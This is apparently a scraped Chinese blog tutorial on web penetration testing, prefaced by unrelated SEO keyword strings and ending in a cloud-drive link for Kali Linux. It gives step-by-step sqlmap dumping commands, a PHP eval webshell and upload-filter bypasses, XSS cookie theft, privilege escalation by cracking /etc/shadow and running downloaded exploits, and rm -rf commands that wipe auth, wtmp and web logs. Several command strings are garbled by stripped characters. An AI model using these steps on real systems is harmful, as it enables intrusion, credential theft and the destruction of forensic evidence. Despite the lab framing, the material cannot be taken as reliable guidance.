企业网站一般用什么域名重庆建设工程信息网安管监督

企业网站一般用什么域名,重庆建设工程信息网安管监督,安徽seo网络推广,怎么做flash网站设计#x1f525; 覆盖Web渗透全链路操作#xff0c;附靶场实操细节避坑技巧#xff0c;零基础也能跟着做#xff0c;干货直接拉满#xff01; 一、Web渗透前置准备#xff08;3步搞定#xff0c;避免实操卡壳#xff09; 1. 环境搭建#xff08;新手优先#xff0c;稳… 覆盖Web渗透全链路操作附靶场实操细节避坑技巧零基础也能跟着做干货直接拉满一、Web渗透前置准备3步搞定避免实操卡壳1. 环境搭建新手优先稳定无风险- 核心环境Kali Linux系统虚拟机/物理机均可推荐虚拟机不影响本地系统 实战靶场优先选 DVWA 入门漏洞清晰、适配新手进阶可选 VulnStack、OWASP WebGoat- 辅助工具Burp Suite抓包改包核心、浏览器插件HackBar、Wappalyzer快速识别网站信息- 关键配置Kali与靶场处于 同一局域网虚拟机选“桥接模式”物理机直接连同一WiFi确保能正常访问靶场地址避免扫描/渗透失败。2. 前期信息收集渗透第一步知己知彼核心目标获取网站基础信息为后续漏洞挖掘铺垫4个必做操作1. 网站指纹识别用 Wappalyzer 插件/ whatweb 网站域名 命令获取服务器系统、Web服务器Apache/Nginx、数据库类型MySQL/PostgreSQL、开发语言PHP/Java等明确攻击方向2. 端口与服务扫描用 Nmap 扫描目标端口指令 nmap -sV -p 1-65535 网站IP 重点关注 80HTTP、443HTTPS、3306MySQL、8080Tomcat等常用端口判断开放服务是否有漏洞3. 目录与文件扫描用 Dirb/Dirsearch 挖掘隐藏目录指令Dirsearch dirsearch -u 网站域名 -e php,html,txt 重点找后台登录页admin/login.php、配置文件config.php、备份文件xxx.rar/xxx.bak可能包含敏感信息4. 子域名枚举用 Sublist3r 工具枚举子域名指令 sublist3r -d 网站域名 扩大渗透范围子域名往往防护更薄弱易出漏洞。3. 渗透核心原则必看避免踩坑违法- 仅在 合法授权靶场 或 自己搭建的测试环境 实操严禁未经允许渗透他人网站/系统违反《网络安全法》将承担法律责任- 实操全程记录步骤、漏洞细节、解决方案形成实战笔记方便复盘和技能沉淀- 渗透后及时清理测试痕迹恢复靶场环境不影响后续学习使用。二、Web渗透全流程实操6步落地从漏洞挖掘到提权步骤1漏洞扫描自动化手动结合精准找漏洞核心工具Burp Suite 主动扫描 Sqlmap 自动化检测覆盖80%新手能落地的漏洞1. Burp Suite 扫描配置- 开启代理将浏览器流量导入Burp拦截请求后进入「Active Scan」模块添加目标网站勾选“SQL注入、XSS跨站、文件上传、CSRF”等高频漏洞类型启动扫描- 扫描完成后查看「Scan Results」标注漏洞等级高危/中危/低危优先处理高危漏洞如SQL注入、文件上传。2. 针对性漏洞检测- SQL注入检测用 Sqlmap 直接检测指令 sqlmap -u 网站URL?参数值 --dbs 自动判断是否存在注入成功后可导出数据库、用户名密码靶场实操示例 sqlmap -u http://192.168.1.100/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookiesecuritylow; PHPSESSIDxxx --dbs - XSS跨站检测在网站输入框、留言板等位置插入XSS测试语句如 scriptalert(xss)/script 若弹窗则存在存储型/反射型XSS漏洞- 文件上传漏洞检测找到网站上传入口尝试上传php一句话木马 ?php eval($_POST[cmd]);? 若能成功上传且可访问漏洞利用成功。步骤2漏洞利用按漏洞等级突破新手先搞定3类高危漏洞1SQL注入漏洞利用最常用直接获取核心数据1. 导出数据库Sqlmap 指令 sqlmap -u 目标URL --dbs 查看所有数据库2. 导出表名指令 sqlmap -u 目标URL -D 数据库名 --tables 重点找 user/admin 等用户表3. 导出字段与数据指令 sqlmap -u 目标URL -D 数据库名 -T 表名 --columns 再用 --dump 导出用户名、密码若密码加密用 John the Ripper 工具破解4. 进阶利用若权限足够用 --os-shell 获取系统命令行执行基础操作如查看文件、创建用户。2文件上传漏洞利用直接获取服务器权限1. 绕过上传限制若网站限制文件类型将php木马后缀改为 php5/php3/phtml 适配Apache服务器或添加图片头信息如 GIF89a 伪装成图片再上传2. 确认木马路径通过目录扫描结果或上传反馈找到木马存放路径如 http://目标IP/upload/1.php5 3. 连接木马用 Kali 自带的蚁剑AntSword添加连接URL填木马路径密码填一句话木马中的参数如 cmd 连接成功后可操控服务器上传/下载文件、执行命令。3XSS跨站漏洞利用获取用户Cookie冒充登录1. 反射型XSS构造恶意链接含XSS语句诱导用户点击用户点击后获取其Cookie可通过 Burp Suite 监听获取2. 存储型XSS在留言板、评论区插入恶意XSS代码代码会存储在数据库所有访问该页面的用户都会触发批量获取Cookie3. 利用Cookie登录将获取的Cookie替换到自己浏览器的对应网站Cookie中可冒充用户登录若为管理员Cookie直接进入后台。步骤3后台权限突破拿到后台账号进一步操作1. 登录后台用SQL注入获取的管理员账号密码登录之前扫描到的后台登录页如 http://目标IP/admin 2. 后台操作核心优先找「文件管理」「系统设置」「插件上传」功能这些模块易实现权限提升- 文件管理直接上传php木马获取服务器权限- 系统设置修改网站首页代码植入恶意脚本或修改数据库配置- 插件上传上传恶意插件伪装成正常插件内含木马安装后触发漏洞。步骤4权限提升从Web权限到系统权限深度渗透核心目标从Web应用权限低权限提升为服务器系统权限root/admin2个新手易落地方法1. 利用系统漏洞提权- 用 uname -a 查看服务器系统版本在 Kali 中搜索对应系统的提权漏洞如 Ubuntu 16.04 对应 CVE-2021-4034 漏洞- 下载漏洞利用脚本从 Exploit-DB 网站获取通过蚁剑上传到服务器赋予执行权限 chmod x 脚本名.sh 运行脚本后获取 root 权限。2. 利用弱密码/配置错误提权- 查看服务器中存储的敏感文件如 /etc/passwd /etc/shadow 用 John the Ripper 破解用户密码若存在 root 弱密码直接 su root 切换权限- 检查 Web 配置文件如 config.php 若包含数据库 root 账号密码尝试用 mysql -u root -p 登录数据库再通过数据库提权命令如 select sys_exec(whoami); 获取系统权限。步骤5日志清理合规实操避免留下痕迹渗透完成后必须清理操作日志避免被追踪核心清理命令- 清理 Bash 历史命令 history -c history -w - 清理 Web 访问日志/错误日志以 Apache 为例 rm -rf /var/log/apache2/access.log /var/log/apache2/error.log - 清理系统登录日志 rm -rf /var/log/auth.log /var/log/wtmp - 备注仅在合法测试环境清理真实场景需按授权要求保留日志合规渗透。步骤6渗透报告编写落地收尾适配求职/复盘核心内容按“4部分”编写逻辑清晰、可落地1. 渗透概述目标网站、渗透时间、渗透目的、使用工具2. 信息收集结果网站指纹、端口服务、目录文件、子域名等3. 漏洞详情与利用按漏洞等级排序每个漏洞包含“漏洞描述、利用步骤、截图证明、风险等级”4. 安全建议针对发现的漏洞给出具体修复方案如 SQL注入 修复参数化查询文件上传 修复后缀白名单文件内容校验。三、新手避坑指南10个高频问题少走3个月弯路1. 扫描无结果/报错优先检查 Kali 与靶场是否同网段关闭靶场防火墙确保工具参数输入正确如 URL 带参数、Cookie 完整2. SQL注入提示“无注入点”换 Sqlmap 扫描参数如 --level 3 --risk 3 或手动测试在参数后加 and 11 -- 观察页面变化3. 文件上传成功但无法访问检查文件路径是否正确服务器是否禁止解析该后缀换其他后缀或伪装图片是否有权限访问上传目录4. 拿到Cookie无法登录Cookie可能有有效期或网站开启了 Cookie 绑定绑定IP/设备需重新获取有效Cookie5. 提权脚本运行失败确认脚本与服务器系统版本匹配赋予脚本执行权限若提示“权限不足”先通过其他方法提升基础权限6. 后台登录后无核心功能可能是低权限管理员账号重新挖掘高权限账号如扫描数据库其他用户表或找后台隐藏功能入口7. Burp抓不到包检查浏览器代理是否配置正确端口与Burp一致关闭浏览器代理插件冲突确保Burp处于“拦截开启”状态8. 靶场无法访问重启靶场服务如 DVWA 重启 ApacheMySQL service apache2 restart service mysql restart 检查靶场配置文件是否正常9. 命令执行无反馈确认服务器是否支持该命令或权限不足换简单命令如 whoami ls 测试逐步排查问题10. 忘记清理日志养成“渗透完成即清理”的习惯可提前整理日志清理命令清单实操后直接执行避免遗漏。四、新手进阶建议从入门到实战快速提升1. 靶场练习优先级先刷 DVWA掌握基础漏洞→ 再练 VulnStack企业级环境→ 最后挑战 OWASP Top 10 专项靶场循序渐进2. 工具学习不用贪多先精通 Burp Suite、Nmap、Sqlmap 3个核心工具再拓展 Nessus、Metasploit 等进阶工具3. 技能沉淀每次实操后整理“漏洞类型利用步骤解决方法”形成自己的实战手册遇到同类问题直接复用4. 行业合规牢记《网络安全法》《数据安全法》所有操作均在合法授权范围内拒绝黑产行为走正规安全从业者路线5. 资源补充关注 FreeBuf、安全客等平台获取最新漏洞动态和实战教程加入 Kali 学习社群遇到问题及时交流解决。最新Kali Linux系统​​​​​​https://pan.quark.cn/s/ff58f9f0e064https://pan.quark.cn/s/ff58f9f0e064